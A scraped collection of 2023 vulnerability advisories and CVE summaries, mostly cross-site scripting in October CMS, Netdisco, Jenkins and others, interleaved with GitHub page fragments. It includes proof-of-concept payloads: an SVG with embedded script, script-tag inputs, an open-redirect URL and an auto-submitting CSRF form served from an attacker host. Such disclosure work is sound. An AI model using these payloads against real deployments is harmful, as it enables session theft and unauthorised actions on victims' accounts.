HCL Verse is susceptible to a Reflected Cross Site Scripting (XSS) vulnerability.  By tricking a user into entering crafted markup a remote, unauthenticated attacker could execute script in a victim's web browser to perform operations as the victim and/or steal the victim's cookies, session tokens, or other sensitive information.


 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2023-28013: Knowledge Article View HCL - Customer Support

HCL BigFix Mobile is vulnerable to a cross-site scripting attack. An authenticated attacker could inject malicious scripts into the application.


An svg file upload vulnerability in October CMS v3.4.4 allows attackers to execute arbitrary code in the context of a browser via a crafted svg file. Attackers must be authenticated as users.

**Stored Cross-Site Scripting October CMS**

Moderate severity GitHub Reviewed Published Jul 26, 2023 to the GitHub Advisory Database • Updated Jul 26, 2023

GHSA-r47v-rxcg-p28j: Stored Cross-Site Scripting October CMS

* A cross-site scripting (XSS) vulnerability in Truedesk v1.2.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into a user chat box.

CVE-2022-31455

An arbitrary file upload vulnerability in October CMS v3.4.4 allows attackers to execute arbitrary code via a crafted file.

**#Exploit Title:** October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)

**#Date:** 29 June 2023

**#Exploit Author:** Okan Kurtulus

**#Vendor Homepage:** https://octobercms.com

**#Version:** v3.4.4

**#Tested on:** Ubuntu 22.04

**#CVE:** 2023-37692

**#Proof of Concept:**

**1-)** Install the system through the website and log in with any user with file upload authority.

**2-)** Click on the Media menu at the top.

**3-)** Create an SVG file using the payload below.

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
        alert(1);
      </script>
    </svg>

**4-)** The XSS payload will be triggered when you call the corresponding SVG file.

**NOTE:** This security vulnerability may continue in other versions. It is recommended to disable the SVG extension for this.

CVE-2023-37692: October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)

Netdisco before v2.063000 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

**Netdisco-CVE-2023-37624****Description**

Netdisco before version 2.063000 was found to contain an open redirect vulnerability due to insufficient validation of an input parameter. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking them into clicking on a specially crafted link.

**Technical Details**

If a user attempts to access a page within Netdisco without a valid session, they are redirected to the login page. Once logged in, the user will be redirected to the page they originally attempted to visit. Insufficient validation of the original url allows a malicious actor to specify an arbitrary URL in the original GET request to the login page.

To reproduce the vulnerability the following URL may be provided:

    http://netdiscoexample.host///www.google.com
    

This will redirect the user to Google after the login process is complete.

**Netdisco-CVE-2023-37623****Description**

Netdisco before version 2.063000 was found to contain multiple stored cross-site scripting (XSS) vulnerabilities. An attacker may exploit this to perform unauthorised actions on behalf of a user.

**Technical Details**

A stored Cross-Site Scripting vulnerability was discovered in the main search box of the web applicaiton. This vulnerability is the result of insufficient sanitisation of the System Name device field. When a search for a device is performed by typing in an IP address, once at least three characters are entered in the search bar matching device System Names are presented in a drop down list by the typeahead feature. If the System Name contains HTML tags, the browser will interpret the contents as valid HTML.

To reproduce the vulnerability, perform the following steps:

1.  Log in to Netdisco as an administrator.
2.  Go to the admin dropdown menu and select Pseudo Devices.
3.  Enter any IPV4 address as the Device IP (eg. 192.168.0.1), then enter the Device Name below, and click the Add button.

    <script>alert(1)</script>
    

4.  Then in the main search box containing the text "Find Anything", enter the first three numbers of the Device IP (i.e. 192).
5.  Observe that the alert box has executed.

Note: There are other ways to inject a payload into the System Name without creating a pseudo device and requiring an admin login.

For example an attacker may set up SNMP on their machine and inserts a Java Script payload as the Device Name, as in the configuration file below:

To inject the payload into Netdisco it is possible to submit a discovery request for the attacker controlled IP. This can be done by enticing an administrator with a valid session can be enticed into clicking on a link that utilises the Open Redirect vulnerability from CVE 2023-37624, for example; 'https://netdiscoexample.host///attacker.host/csrf.html', where netdiscoexample.host is the Netdisco URL and attacker.host/csrf.html hosts the following HTML:

<body onload\="document.form.submit()"\>
   <form action\="https://netdiscoexample.host/admin/discover?device=attackerIP" method\="POST" name\="form" style\="display;none;"\>
</form\>
</body\>

If the administrator clicks on this link then attacker's machine will be discovered and the payload loaded through SNMP and executed when the IP is entered in the search bar, as in the screenshot below.

An additional stored Cross-Site Scripting vulnerability was found in the Job Queue page. This vulnerability is the result of insufficient sanitisation of the Param job field.

To reproduce the vulnerability, perform the following steps:

1.  Log into Netdisco as an administrator.
2.  Go to the Inventory page and open any device. If a device is not present, then add a Pseudo Device as above.
3.  Click in the contact field and enter the following text:

    <script>alert(1)</script>
    

4.  Go to the Admin dropdown menu and select Job Queue.
5.  Esnure the job has a Status of "Done", then hover the mouse point over the Param field containing the text "<script>alert(1)</script>".
6.  Observe that the alert box has executed.

CVE-2023-37624: GitHub - benjaminpsinclair/Netdisco-2023-Advisory

An XSS issue was discovered in FSMLabs TimeKeeper 8.0.17. On the "Configuration -> Compliance -> Add a new compliance report" and "Configuration -> Timekeeper Configuration -> Add a new source there" screens, there are entry points to inject JavaScript code.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-31466: Disclosure/CVE PoC/CVE-2023-31466.md at main · CapgeminiCisRedTeam/Disclosure

A cross-site scripting (XSS) vulnerability in Truedesk v1.2.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the team name parameter.

CVE-2022-31456

A missing origin validation in Slate sandbox could be exploited by a malicious user to modify the page's content, which could lead to phishing attacks.

CVE-2023-30949: Palantir | Trust and Security Portal

Jenkins applies formatting to the console output of builds, transforming plain URLs into hyperlinks. Jenkins 2.415 and earlier, LTS 2.401.2 and earlier does not sanitize or properly encode URLs of these hyperlinks in build logs. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control build log contents. Jenkins 2.416, LTS 2.401.3 encodes URLs of affected hyperlink annotations in build logs.


**Jenkins Stored Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Jul 26, 2023 to the GitHub Advisory Database • Updated Jul 26, 2023

Tag

#xss